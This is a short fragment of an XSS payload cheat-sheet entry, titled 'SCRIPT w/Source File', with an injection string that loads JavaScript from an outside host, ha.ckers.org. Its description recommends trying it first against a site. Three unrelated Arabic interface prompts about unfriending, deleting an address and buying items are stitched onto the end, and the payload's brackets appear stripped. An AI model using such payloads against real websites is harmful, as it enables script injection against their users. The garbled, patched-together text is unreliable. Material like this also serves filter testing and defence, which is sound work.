<code>SCRIPT SRC=http://ha.ckers.org/xss.js/SCRIPT</code>
<label>Basic XSS Attacks</label>
<desc>No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).</desc>
<name>SCRIPT w/Source File</name>
<attack>
</attack>
هل أنت متأكد أنك تريد غير صديق؟
هل أنت متأكد من أنك تريد حذف هذا العنوان؟
أنت على وشك شراء العناصر، هل تريد المتابعة؟